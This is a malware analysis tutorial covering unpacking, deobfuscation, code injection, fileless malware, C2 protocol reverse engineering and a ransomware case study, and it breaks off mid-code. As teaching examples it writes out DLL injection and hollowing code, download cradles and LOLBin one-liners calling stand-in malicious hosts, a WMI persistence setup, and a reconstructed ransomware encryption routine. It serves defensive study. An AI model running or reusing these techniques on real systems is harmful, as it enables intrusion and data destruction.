11 April 2025

Malware Analysis – Lesson 2: Advanced Techniques and Practical Examples

1. Advanced Static Analysis: Unpacking and Deobfuscation

Understanding Packers

Packers compress or encrypt executable files (often both), which hinders signature-based detection and static analysis. Common packers include UPX, Themida, VMProtect, and custom packers.

Identifying Packed Executables:

1. Entropy Analysis:

# Python script to calculate section entropy
import math
import pefile

def calculate_entropy(data):
    if not data:
        return 0
    entropy = 0
    for x in range(256):
        p_x = float(data.count(x)) / len(data)
        if p_x > 0:
            entropy += - p_x * math.log(p_x, 2)
    return entropy

pe = pefile.PE('packed_malware.exe')
for section in pe.sections:
    # Section names are NUL-padded to 8 bytes and may not be valid UTF-8
    name = section.Name.decode(errors='replace').rstrip('\x00')
    entropy = calculate_entropy(section.get_data())
    print(f"{name}: {entropy:.2f}")
  • Entropy above 7.0 (the maximum is 8.0 bits per byte) often indicates compression or encryption

2. Section Characteristics:

  • Small .text section with large .data or custom sections
  • Unusual section names
  • Write + Execute permissions on sections
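
The section checks above can be sketched as a small helper. This is a minimal illustration, not a complete packer detector: the allow-list of section names and the example values are assumptions, while the two flag constants come from the PE/COFF specification.

```python
# PE section flag values from the PE/COFF specification
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names emitted by common compilers (illustrative allow-list, not exhaustive)
COMMON_NAMES = {".text", ".data", ".rdata", ".rsrc", ".reloc",
                ".idata", ".pdata", ".bss", ".tls"}

def section_flags(name, characteristics, raw_size, virtual_size):
    """Return a list of reasons a section looks packed (empty if none)."""
    reasons = []
    if name not in COMMON_NAMES:
        reasons.append("unusual name")
    if (characteristics & IMAGE_SCN_MEM_EXECUTE) and (characteristics & IMAGE_SCN_MEM_WRITE):
        reasons.append("writable and executable")
    if raw_size == 0 and virtual_size > 0:
        reasons.append("empty on disk, filled at runtime")
    return reasons

# Hypothetical values resembling a UPX0 section and an ordinary .text section
print(section_flags("UPX0", 0xE0000080, 0, 0x8000))
print(section_flags(".text", 0x60000020, 0x1000, 0xFF0))
```

With pefile, the inputs would come from section.Name, section.Characteristics, section.SizeOfRawData, and section.Misc_VirtualSize.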

Manual Unpacking Techniques

Step-by-Step UPX Unpacking:

1. Load in x64dbg (use the x32dbg build for 32-bit samples):

  • Open the packed executable
  • Press F9 to run from the system breakpoint to the entry point

2. Find OEP (Original Entry Point):

Common techniques:
- ESP tracking method
- Jump to OEP pattern (JMP or PUSH/RET)
- Memory breakpoints on section access

3. ESP Tracking Method:

; At entry point
PUSHAD                    ; Save all registers
; ... unpacking code ...
POPAD                     ; Restore registers
JMP original_entry_point  ; Jump to OEP
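  • Step over PUSHAD, then set a hardware breakpoint on access at the address now held in ESP
  • Run until the breakpoint fires, which happens when POPAD reads the saved registers back
  • Step until the JMP to the OEP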

4. Dumping Unpacked Code:

  • Use Scylla plugin in x64dbg
  • Dump process at OEP
  • Fix Import Address Table (IAT)

Advanced Deobfuscation

Control Flow Flattening:

Original code:

if (condition) {
    actionA();
} else {
    actionB();
}

Obfuscated:

state = 1;
while (1) {
    switch(state) {
        case 1:
            if (condition) state = 2;
            else state = 3;
            break;
        case 2:
            actionA();
            state = 4;
            break;
        case 3:
            actionB();
            state = 4;
            break;
        case 4:
            return;
    }
}

Deobfuscation Approach:

  1. Identify dispatcher loop
  2. Trace execution flow
  3. Reconstruct original control flow
  4. Use IDA Python scripts for automation
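
Step 3 can be sketched independently of any disassembler. Assuming the dispatcher has already been traced into a table of state transitions (the table below is read off the flattened example by hand), walking that table yields the real control-flow edges. The function name and table layout are hypothetical.

```python
def recover_edges(transitions, entry):
    """Walk a state-transition table and return the real control-flow edges."""
    edges, seen, stack = [], set(), [entry]
    while stack:
        state = stack.pop()
        if state in seen:
            continue
        seen.add(state)
        for nxt in transitions.get(state, []):
            edges.append((state, nxt))
            stack.append(nxt)
    return edges

# state -> possible next states, taken from the switch statement above
table = {1: [2, 3], 2: [4], 3: [4], 4: []}
print(sorted(recover_edges(table, entry=1)))
```

The edges 1→2 and 1→3 are the two arms of the original if/else, and both arms converge on state 4, the exit.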

String Deobfuscation

Common String Obfuscation:

1. XOR Encryption:

# IDA Python script to decrypt XOR strings
import idc
def xor_decrypt(encrypted, key):
    decrypted = []
    for i, char in enumerate(encrypted):
        decrypted.append(chr(char ^ key[i % len(key)]))
    return ''.join(decrypted)

# Find encrypted string references
ea = idc.get_screen_ea()
encrypted_data = idc.get_bytes(ea, 50)
key = [0x41, 0x42, 0x43]  # Found through analysis
print(xor_decrypt(encrypted_data, key))
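
When the key has not yet been located in the binary, a known plaintext prefix is often enough to recover it. The sketch below assumes a repeating-key XOR and a guessed key length; the URL and key are made-up test values.

```python
def xor_bytes(data, key):
    """Apply a repeating XOR key to a byte string."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_xor_key(ciphertext, known_plaintext, key_len):
    """Derive a repeating XOR key from a known plaintext prefix."""
    if len(known_plaintext) < key_len:
        raise ValueError("need at least key_len known bytes")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))

# Simulate an encrypted C2 URL, then recover the key from the "http://" prefix
secret = xor_bytes(b"http://example.test/gate.php", b"ABC")
key = recover_xor_key(secret, b"http://", 3)
print(key, xor_bytes(secret, key))
```

If the key length is unknown, trying each candidate length and checking whether the output is printable is usually sufficient for short keys.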

2. Stack Strings:

; Building strings on stack (each dword is stored little-endian)
mov dword ptr [esp], 70747468h    ; "http"
mov dword ptr [esp+4], 002F2F3Ah  ; "://" plus NUL terminator
; Results in "http://"
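
Stack strings can be reassembled offline once the stores have been collected from the disassembly. A minimal sketch, assuming each store is recorded as a hypothetical (offset, immediate, size) tuple and that the target is little-endian x86:

```python
def rebuild_stack_string(writes):
    """Reassemble bytes from (offset, immediate, size) little-endian stores."""
    end = max(off + size for off, _, size in writes)
    buf = bytearray(end)
    for off, imm, size in writes:
        buf[off:off + size] = imm.to_bytes(size, "little")
    # Stop at the first NUL terminator, as a C string would
    return bytes(buf).split(b"\x00", 1)[0].decode("ascii", errors="replace")

# Two dword stores spelling "http" and "://" followed by a NUL
writes = [(0, 0x70747468, 4), (4, 0x002F2F3A, 4)]
print(rebuild_stack_string(writes))
```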

2. Reverse Engineering Cryptographic Functions

Identifying Cryptographic Operations

Common Crypto Constants:

# AES S-box first values
AES_SBOX = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]

# MD5 initialization values
MD5_INIT = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]

# RC4 key scheduling
RC4_PATTERN = "mov byte ptr [ecx+eax], dl"

IDA Pro FLIRT Signatures:

  • Apply crypto library signatures
  • Identify standard implementations
  • Look for custom modifications
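
Before applying signatures, a plain byte search for the constants above can point at candidate crypto code. The sketch assumes the MD5 words are stored contiguously in little-endian order; compilers frequently embed them as separate immediates instead, in which case this search misses them.

```python
import struct

SIGNATURES = {
    "AES S-box": bytes([0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]),
    # MD5 init words as they would appear in a little-endian data table
    "MD5 init": struct.pack("<4I", 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476),
}

def find_crypto_constants(blob):
    """Return (name, offset) for each known constant found in blob."""
    hits = []
    for name, pattern in SIGNATURES.items():
        offset = blob.find(pattern)
        if offset != -1:
            hits.append((name, offset))
    return hits

# Synthetic buffer: padding, then the start of the AES S-box
sample = b"\x90" * 16 + SIGNATURES["AES S-box"] + b"\x00" * 8
print(find_crypto_constants(sample))
```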

Analyzing Custom Crypto

Step-by-Step RC4 Analysis:

1. Key Scheduling Algorithm (KSA):

// Identify this pattern in assembly
for (i = 0; i < 256; i++) {
    S[i] = i;
}
j = 0;
for (i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % keylen]) % 256;
    swap(S[i], S[j]);
}

2. Pseudo-Random Generation Algorithm (PRGA):

i = j = 0;
while (generating_output) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    swap(S[i], S[j]);
    K = S[(S[i] + S[j]) % 256];
    output = input ^ K;
}

3. Extracting Keys:

  • Set breakpoints at crypto functions
  • Dump memory containing key material
  • Trace key derivation functions
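
Once a candidate key has been dumped, a reference implementation confirms whether the routine really is unmodified RC4. The sketch follows the KSA and PRGA shown above; the key and plaintext are the widely published "Key"/"Plaintext" test vector, not values from a sample.

```python
def rc4(key, data):
    """Encrypt or decrypt data with RC4 (the operation is symmetric)."""
    # Key Scheduling Algorithm
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-Random Generation Algorithm
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ciphertext = rc4(b"Key", b"Plaintext")
print(ciphertext.hex())  # bbf316e8d940af0ad3
```

If the output of the sample's routine differs from this reference for the same key and input, the implementation has probably been modified (for example, a different S-box size or dropped initial keystream bytes).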

Practical Decryption Example

Ransomware Configuration Decryption:

# Found through reverse engineering
def decrypt_config(encrypted_config):
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    
    # Key found in binary at offset 0x4A300
    key = b'\x11\x22\x33\x44' * 4  # 16 bytes for AES-128
    iv = b'\x00' * 16  # Often zeros or hardcoded
    
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_config)
    
    # Remove PKCS7 padding
    config = unpad(decrypted, AES.block_size)
    return config

# Extract C2 servers from decrypted config
import json
config_data = decrypt_config(encrypted_blob)
config = json.loads(config_data)
print("C2 Servers:", config['c2_servers'])
print("Encryption Key:", config['file_encryption_key'])

3. Advanced Dynamic Analysis: Code Injection Techniques

Process Injection Methods

1. Classic DLL Injection:

// Injection code pattern
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
LPVOID pRemoteBuffer = VirtualAllocEx(hProcess, NULL, dllPathSize, 
                                     MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuffer, dllPath, dllPathSize, NULL);
HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
LPVOID pLoadLibrary = GetProcAddress(hKernel32, "LoadLibraryA");
CreateRemoteThread(hProcess, NULL, 0, pLoadLibrary, pRemoteBuffer, 0, NULL);

Monitoring with WinAPIOverride:

  1. Attach to target process
  2. Monitor for:
    • OpenProcess calls
    • VirtualAllocEx allocations
    • WriteProcessMemory operations
    • CreateRemoteThread creation
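
The monitored calls are most telling as an ordered sequence rather than individually. A minimal sketch, assuming the API monitor's log has been reduced to a list of call names (the trace below is invented for illustration):

```python
def contains_in_order(calls, pattern):
    """True if every API in pattern appears in calls, in that order."""
    it = iter(calls)
    # "api in it" consumes the iterator up to the match, enforcing order
    return all(api in it for api in pattern)

DLL_INJECTION = ["OpenProcess", "VirtualAllocEx",
                 "WriteProcessMemory", "CreateRemoteThread"]

trace = ["CreateFileW", "OpenProcess", "VirtualAllocEx", "ReadFile",
         "WriteProcessMemory", "CreateRemoteThread"]
print(contains_in_order(trace, DLL_INJECTION))
```

Unrelated calls between the steps are tolerated, which matters because real traces are noisy.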

2. Process Hollowing:

; Typical hollowing sequence
CreateProcess(..., CREATE_SUSPENDED, ...)
GetThreadContext(hThread, &context)
ReadProcessMemory(...) ; Read headers
NtUnmapViewOfSection(hProcess, pImageBase)
VirtualAllocEx(hProcess, pImageBase, ...)
WriteProcessMemory(...) ; Write malicious PE
SetThreadContext(hThread, &context)
ResumeThread(hThread)

Detection in Sysmon:

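<!-- Sysmon config for process hollowing detection -->
<!-- Sysmon does not log process creation flags, so CREATE_SUSPENDED cannot be
     matched on CommandLine. ProcessTampering (Event ID 25, Sysmon 13+) reports
     image replacement instead; an empty exclude rule logs every such event. -->
<ProcessTampering onmatch="exclude">
</ProcessTampering>
<ProcessAccess onmatch="include">
    <GrantedAccess condition="is">0x1F0FFF</GrantedAccess>
</ProcessAccess>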

Advanced Injection Techniques

3. AtomBombing:

// Atom table injection
GlobalAddAtom(shellcode_chunk);
// Force target to access atom table
NtQueueApcThread(hThread, GlobalGetAtomName, ...)

4. SetWindowsHookEx Injection:

Monitoring approach:

# Volatility plugin to detect hooks
volatility -f memory.dmp --profile=Win10x64 messagehooks

# List kernel notification callbacks (driver-level, separate from message hooks)
volatility -f memory.dmp --profile=Win10x64 callbacks

Shellcode Analysis

Extracting Injected Code:

1. Process Memory Dump:

# Using Process Hacker
1. Right-click on process
2. Properties -> Memory
3. Find RWX regions
4. Save selected region

2. Shellcode Emulation:

# Using Unicorn Engine
from unicorn import *
from unicorn.x86_const import *

def emulate_shellcode(shellcode):
    mu = Uc(UC_ARCH_X86, UC_MODE_32)
    
    # Map memory
    mu.mem_map(0x1000000, 2 * 1024 * 1024)
    mu.mem_write(0x1000000, shellcode)
    
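    # Set up stack in the middle of the mapped region so pushes and pops stay in bounds
    mu.reg_write(UC_X86_REG_ESP, 0x1100000)
    
    # Trace every executed instruction
    def hook_code(uc, address, size, user_data):
        print(f"Executing: 0x{address:x}")
    
    mu.hook_add(UC_HOOK_CODE, hook_code)
    
    # Start emulation; accesses to unmapped memory (such as API calls) raise UcError
    try:
        mu.emu_start(0x1000000, 0x1000000 + len(shellcode))
    except UcError as e:
        print(f"Emulation stopped: {e}")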

4. Analyzing Fileless Malware

PowerShell-Based Threats

Deobfuscating PowerShell:

1. Common Obfuscation Patterns:

# Obfuscated
${`e`x`e`c} = &('n'+'ew-ob'+'ject') NeT.WeBcLiEnT
${d`o`w`n} = ${`e`x`e`c}."d`o`w`N`l`o`A`d`S`t`R`i`n`g"('ht'+'tp://c2.com/payload')

# Deobfuscated
$exec = New-Object Net.WebClient
$down = $exec.DownloadString('http://c2.com/payload')
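
The two tricks in this sample, decorative backticks and split string literals, can be undone mechanically. The sketch below is deliberately naive: it removes every backtick, which is only safe when none of them are real escapes such as `n, and it handles only single-quoted concatenation.

```python
import re

# Matches 'a' + 'b' so the pair can be folded into 'ab'
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def normalize_powershell(line):
    """Strip backticks and merge adjacent single-quoted string literals."""
    line = line.replace("`", "")
    while True:
        merged = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", line)
        if merged == line:
            return line
        line = merged

print(normalize_powershell("&('n'+'ew-ob'+'ject') NeT.WeBcLiEnT"))
```

Case normalization is left out on purpose, since PowerShell is case-insensitive and the mixed case is itself a useful indicator.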

2. PowerShell Logging:

# Enable transcript logging
Start-Transcript -Path "C:\Analysis\ps_log.txt" -Append

# Enable script block logging via Group Policy
Computer Configuration > Policies > Administrative Templates > 
Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging

3. Memory Analysis of PowerShell:

# Volatility command to extract PowerShell history
volatility -f memory.dmp --profile=Win10x64 consoles

# Extract .NET assemblies from memory
volatility -f memory.dmp --profile=Win10x64 dumpdotnet -D output/

WMI-Based Persistence

Detecting WMI Implants:

1. Query WMI Repository:

# List all WMI Event Filters
Get-WMIObject -Namespace root\subscription -Class __EventFilter

# List Event Consumers
Get-WMIObject -Namespace root\subscription -Class __EventConsumer

# List Bindings
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding

2. Malicious WMI Example:

# Malicious Event Filter (triggers every 60 seconds)
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
    Name = "MaliciousFilter"
    EventNameSpace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}

# CommandLineEventConsumer (executes PowerShell)
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
    Name = "MaliciousConsumer"
    CommandLineTemplate = "powershell.exe -NoP -W Hidden -Enc <base64_payload>"
}

Living-off-the-Land Techniques

Analyzing LOLBins Usage:

1. Common LOLBins Patterns:

# Downloading with certutil
certutil.exe -urlcache -split -f http://malicious.com/payload.exe

# Execution via mshta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -enc <payload>'))

# Script execution via rundll32 (abuses mshtml's RunHTMLApplication export)
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("malicious_code")

2. Detection Strategy:

<!-- Sysmon rule for LOLBin detection -->
<ProcessCreate onmatch="include">
    <CommandLine condition="contains all">certutil;urlcache</CommandLine>
    <CommandLine condition="contains all">mshta;javascript:</CommandLine>
    <CommandLine condition="contains all">rundll32;javascript:</CommandLine>
</ProcessCreate>
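
The same patterns can be applied offline to command lines exported from logs. A minimal sketch with hypothetical rule names; the regular expressions tolerate an optional ".exe" suffix and the "/" switch prefix, both of which a plain substring match can miss.

```python
import re

LOLBIN_RULES = {
    "certutil download": re.compile(r"certutil(\.exe)?\b.*[-/]urlcache", re.I),
    "mshta inline script": re.compile(r"mshta(\.exe)?\s+(javascript|vbscript):", re.I),
    "rundll32 inline script": re.compile(r"rundll32(\.exe)?\s+javascript:", re.I),
}

def match_lolbins(command_line):
    """Return the names of all rules that match a process command line."""
    return [name for name, rx in LOLBIN_RULES.items() if rx.search(command_line)]

print(match_lolbins("certutil.exe -urlcache -split -f http://malicious.com/payload.exe"))
print(match_lolbins("notepad.exe report.txt"))
```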

5. C2 Communication Protocol Reverse Engineering

HTTP/HTTPS C2 Analysis

Dissecting C2 Protocols:

1. Custom HTTP Headers:

POST /api/beacon HTTP/1.1
Host: legitimate-site.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0)
X-Session-ID: AES256(victim_id + timestamp)
X-Request-Type: beacon
Cookie: session=BASE64(encrypted_data)

ENCRYPTED_PAYLOAD_DATA

2. Protocol Reverse Engineering Steps:

  • Capture multiple communication sessions
  • Identify patterns in headers/data
  • Correlate with binary analysis
  • Decrypt/decode payloads

DNS Tunneling Analysis

Identifying DNS C2:

1. Suspicious DNS Patterns:

# Wireshark display filter
dns.qry.name matches "^[a-f0-9]{32}[.]" and dns.qry.type == 1

# Example DNS tunneling query
# 61626364656667686970717273747576.malicious-c2.com
# Decoded: "abcdefghipqrstuv" (data exfiltration)

2. Decoding DNS Tunneling:

def decode_dns_tunnel(queries):
    data = b''
    for query in queries:
        subdomain = query.split('.')[0]
        # Common encoding: hex
        chunk = bytes.fromhex(subdomain)
        data += chunk
    
    # The reassembled bytes may still be compressed or encrypted; apply the
    # sample-specific routines recovered from the binary before interpreting them
    return data
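
In a real capture the tunnel queries are mixed with ordinary lookups, so a triage step is needed before decoding. The sketch below assumes hex encoding in the first label and uses an arbitrary minimum length of 24 characters; both are assumptions to tune per sample.

```python
import string

HEX_CHARS = set(string.hexdigits.lower())

def suspicious_label(qname, min_len=24):
    """Flag a query whose first label is a long, even-length hex string."""
    label = qname.split(".")[0].lower()
    return len(label) >= min_len and len(label) % 2 == 0 and set(label) <= HEX_CHARS

def triage(queries):
    """Split queries into (decoded payload chunks, ignored names)."""
    decoded, ignored = [], []
    for q in queries:
        if suspicious_label(q):
            decoded.append(bytes.fromhex(q.split(".")[0]))
        else:
            ignored.append(q)
    return decoded, ignored

print(triage(["61626364656667686970717273747576.malicious-c2.com",
              "www.example.com"]))
```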

Custom Binary Protocols

Reverse Engineering Binary C2:

1. Protocol Structure Analysis:

struct C2_Packet {
    uint32_t magic;          // 0xDEADBEEF
    uint16_t packet_type;    // Command type
    uint16_t packet_length;  // Data length
    uint32_t session_id;     // Victim identifier
    uint8_t encrypted_data[]; // AES encrypted payload
};
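
The header layout can be validated against captured payloads before writing a full dissector. This sketch assumes the fields are packed without padding and sent in network (big-endian) byte order; if the sample writes the struct straight from x86 memory, switch the format prefix to "<".

```python
import struct

HEADER = struct.Struct(">IHHI")  # magic, packet_type, packet_length, session_id
MAGIC = 0xDEADBEEF

def parse_c2_packet(data):
    """Parse the 12-byte header and return the fields plus the raw payload."""
    if len(data) < HEADER.size:
        raise ValueError("short packet")
    magic, ptype, length, session = HEADER.unpack_from(data)
    if magic != MAGIC:
        raise ValueError("bad magic")
    payload = data[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return {"type": ptype, "session_id": session, "payload": payload}

# Synthetic packet: type 2, 4-byte payload, session 0x1234
packet = HEADER.pack(MAGIC, 2, 4, 0x1234) + b"ABCD"
print(parse_c2_packet(packet))
```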

2. Creating Protocol Dissector:

-- Wireshark Lua dissector
local c2_proto = Proto("c2", "Custom C2 Protocol")

local f_magic = ProtoField.uint32("c2.magic", "Magic", base.HEX)
local f_type = ProtoField.uint16("c2.type", "Type", base.DEC)
local f_length = ProtoField.uint16("c2.length", "Length", base.DEC)
local f_session = ProtoField.uint32("c2.session", "Session ID", base.HEX)

c2_proto.fields = {f_magic, f_type, f_length, f_session}

function c2_proto.dissector(buffer, pinfo, tree)
    pinfo.cols.protocol = "C2"
    local subtree = tree:add(c2_proto, buffer(), "C2 Protocol")
    
    subtree:add(f_magic, buffer(0,4))
    subtree:add(f_type, buffer(4,2))
    subtree:add(f_length, buffer(6,2))
    subtree:add(f_session, buffer(8,4))
end

tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(8443, c2_proto)

6. Practical Case Study: Ransomware Analysis

Initial Triage

Sample: CryptoLocker Variant

1. Static Properties:

SHA256: a1b2c3d4e5f6789...
File Type: PE32 executable
Compile Time: 2024-01-15 08:30:00
Packer: UPX 3.96

2. Behavioral Summary:

  • Deletes volume shadow copies
  • Encrypts files with .locked extension
  • Drops ransom note: DECRYPT_INSTRUCTIONS.txt
  • Communicates with Tor hidden service

Detailed Analysis Workflow

Step 1: Unpacking

; UPX stub at the packed entry point (ends with the jump to the OEP)
0x00401000: PUSHAD
0x00401001: MOV ESI, 0x00409000  ; Packed data
0x00401006: MOV EDI, 0x00401000  ; Destination
...
0x00401150: POPAD
0x00401151: JMP 0x004A5000       ; Original Entry Point

Step 2: Encryption Routine Analysis

// Reconstructed from assembly
void encrypt_file(char* filename) {
    FILE* file = fopen(filename, "rb");
    if (!file) return;
    
    // Generate unique file key
    unsigned char file_key[32];
    CryptGenRandom(hProv, 32, file_key);
    
    // Encrypt file key with RSA public key
    unsigned char encrypted_key[256];
    RSA_public_encrypt(32, file_key, encrypted_key, rsa_public, RSA_PKCS1_OAEP_PADDING);
    
    // Read file content
    fseek(file, 0, SEEK_END);
    long file_size = ftell(file);
    fseek(file, 0, SEEK_SET);
    
    unsigned char* buffer = malloc(file_size);
    fread(buffer, 1, file_size, file);
    fclose(file);
    
    // AES-256 CBC encryption
    AES_KEY aes_key;
    AES_set_encrypt_key(file_key, 256, &aes_key);
    
    unsigned char iv[16] = {0};
    AES_cbc_encrypt(buffer, buffer, file_size, &aes_key, iv, AES_ENCRYPT);
    
    // Write encrypted file
    char new_filename[MAX_PATH];
    sprintf(new_filename, "%s.locked", filename);
    file = fopen(new_filename, "wb");
    
    // File structure: [RSA_encrypted_key][AES_encrypted_data]
    fwrite(encrypted_key, 1, 256, file);
    fwrite(buffer, 1, file_size, file);
    fclose(file);
    
    // Delete original
    DeleteFile(filename);
}
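
For triage of affected files, the on-disk layout written by this routine can be split back into its two parts. A minimal sketch, assuming the 256-byte RSA blob comes first as in the fwrite calls above; the function and field names are hypothetical.

```python
RSA_BLOB_SIZE = 256  # size of the RSA-encrypted key written first
AES_BLOCK = 16

def split_locked_file(blob):
    """Separate the wrapped AES key from the encrypted file body."""
    if len(blob) < RSA_BLOB_SIZE:
        raise ValueError("too small to be a .locked file")
    wrapped_key, body = blob[:RSA_BLOB_SIZE], blob[RSA_BLOB_SIZE:]
    return {
        "wrapped_key": wrapped_key,
        "body": body,
        # CBC output is normally a whole number of blocks
        "block_aligned": len(body) % AES_BLOCK == 0,
    }

# Synthetic file: 256 key bytes followed by two AES blocks
parts = split_locked_file(b"\x01" * 256 + b"\x02" * 32)
print(len(parts["wrapped_key"]), len(parts["body"]), parts["block_aligned"])
```

The wrapped key is useless without the attacker's RSA private key, but isolating it makes it easy to test recovered keys against many files at once.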

Step 3: Kill Switch Discovery

# IDA Python script to find kill switch
import idaapi
import idautils
import idc

# Search for mutex creation
mutex_refs = []
for addr in idautils.XrefsTo(idc.get_name_ea_simple("CreateMutexW")):
    mutex_refs.append(addr.frm)

# Analyze mutex names
for ref in mutex_refs:
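    # Trace back to find mutex name (the fixed -0x10 offset is specific to this
    # sample; walk back with idc.prev_head() for other binaries)
    mutex_name_addr = idc.get_operand_value(ref - 0x10, 1)
    mutex_name = idc.get_strlit_contents(mutex_name_addr, -1, idc.STRTYPE_C_16)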
    print(f"Mutex: {mutex_name}")
    
# Found: Global\MsCryptoLockerKillSwitch2024

Step 4: C2 Communication

# Extracted Tor configuration
TOR_HIDDEN_SERVICE = "cryptolocker2024xxxxxxxxx.onion"
BITCOIN_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

# Communication protocol
def send_infection_report(victim_id, encrypted_files_count):
    data = {
        "victim_id": victim_id,
        "timestamp": time.time(),
        "files_encrypted": encrypted_files_count,
        "bitcoin_address": BITCOIN_ADDRESS,
        "system_info": get_system_info()
    }
    
    # Send via Tor
    session = requests.Session()
    session.proxies = {'http': 'socks5h://localhost:9050',
                      'https': 'socks5h://localhost:9050'}
    
    response = session.post(f"http://{TOR_HIDDEN_SERVICE}/report",
                          json=data, timeout=30)

Recovery and Mitigation

File Recovery Attempts:

1. Check for Encryption Flaws:

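# Analyze encryption implementation
# Found: fixed all-zero IV in early versions
def attempt_recovery(encrypted_file):
    # A fixed IV only helps recovery if the AES key is also reused across files:
    # identical plaintext prefixes then produce identical ciphertext blocks,
    # which opens the door to known-plaintext comparisons
    pass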

2. Shadow Copy Recovery:

vssadmin list shadows
# If ransomware failed to delete all shadows
mklink /d C:\ShadowRestore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

7. Automated Analysis Pipeline Development

Building an Analysis Framework

Architecture Overview:

# analysis_pipeline.py
import os
import hashlib
import subprocess
import json
from datetime import datetime

class MalwareAnalysisPipeline:
    def __init__(self, sample_path):
        self.sample_path = sample_path
        self.sample_hash = self.calculate_hash()
        self.results = {
            "hash": self.sample_hash,
            "timestamp": datetime.now().isoformat(),
            "static_analysis": {},
            "dynamic_analysis": {},
            "network_analysis": {},
            "verdict": "unknown"
        }
    
    def calculate_hash(self):
        sha256_hash = hashlib.sha256()
        with open(self.sample_path, "rb") as f:
            for byte_block in iter(lambda: f.read(4096), b""):
                sha256_hash.update(byte_block)
        return sha256_hash.hexdigest()
    
    def run_static_analysis(self):
        # PE analysis
        pe_info = self.analyze_pe_structure()
        self.results["static_analysis"]["pe_info"] = pe_info
        
        # String extraction
        strings = self.extract_strings()
        self.results["static_analysis"]["strings"] = strings
        
        # YARA scanning
        yara_matches = self.run_yara_rules()
        self.results["static_analysis"]["yara_matches"] = yara_matches
        
    def run_dynamic_analysis(self):
        # Sandbox execution
        sandbox_report = self.execute_in_sandbox()
        self.results["dynamic_analysis"] = sandbox_report
        
    def analyze_pe_structure(self):
        # Using pefile
        import pefile
        from datetime import timezone
        pe = pefile.PE(self.sample_path)
        
        return {
            "imphash": pe.get_imphash(),
            # TimeDateStamp counts seconds since the epoch in UTC
            "compile_time": datetime.fromtimestamp(pe.FILE_HEADER.TimeDateStamp, tz=timezone.utc).isoformat(),
            "sections": [
                {
                    "name": section.Name.decode(errors="replace").rstrip('\x00'),
                    "virtual_size": section.Misc_VirtualSize,
                    "raw_size": section.SizeOfRawData,
                    "entropy": section.get_entropy()
                }
                for section in pe.sections
            ],
            "imports": self.extract_imports(pe)
        }
    
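    def execute_in_sandbox(self, api_url="http://localhost:8090", api_token=""):
        # Cuckoo Sandbox integration via its REST API; api_url and api_token
        # are deployment-specific assumptions
        import time
        import requests
        headers = {"Authorization": f"Bearer {api_token}"}
        
        with open(self.sample_path, "rb") as sample:
            response = requests.post(f"{api_url}/tasks/create/file",
                                     files={"file": sample}, headers=headers)
        task_id = response.json()["task_id"]
        
        # Wait for analysis completion
        while True:
            task = requests.get(f"{api_url}/tasks/view/{task_id}", headers=headers).json()
            if task["task"]["status"] == "reported":
                break
            time.sleep(30)
        
        # Retrieve report
        report = requests.get(f"{api_url}/tasks/report/{task_id}", headers=headers)
        return report.json()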
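
The pipeline calls extract_strings() without defining it. One possible shape for that helper is sketched below as a standalone function; the minimum length of 4 and the choice to cover only ASCII and UTF-16LE are assumptions.

```python
import re

def extract_strings(data, min_len=4):
    """Return printable ASCII and UTF-16LE strings found in a byte buffer."""
    ascii_rx = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_rx = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_rx.finditer(data)]
    found += [m.group().decode("utf-16le") for m in wide_rx.finditer(data)]
    return found

# Synthetic buffer with one ASCII string and one wide string
blob = b"\x01\x02http://c2.test\x00\x03" + "cmd.exe".encode("utf-16le")
print(extract_strings(blob))
```

Inside the class it would read the sample from self.sample_path and pass the bytes to this function.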

Integration with Threat Intelligence

Threat Intel Enrichment:

class ThreatIntelligence:
    def __init__(self, api_keys):
        self.vt_api_key = api_keys.get('virustotal')
        self.otx_api_key = api_keys.get('alienvault_otx')
        self.misp_url = api_keys.get('misp_url')
        self.misp_key = api_keys.get('misp_key')
    
    def check_virustotal(self, file_hash):
        import requests
        headers = {"x-apikey": self.vt_api_key}
        url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
        
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            data = response.json()
            return {
                "detections": data["data"]["attributes"]["last_analysis_stats"],
                "names": data["data"]["attributes"]["names"],
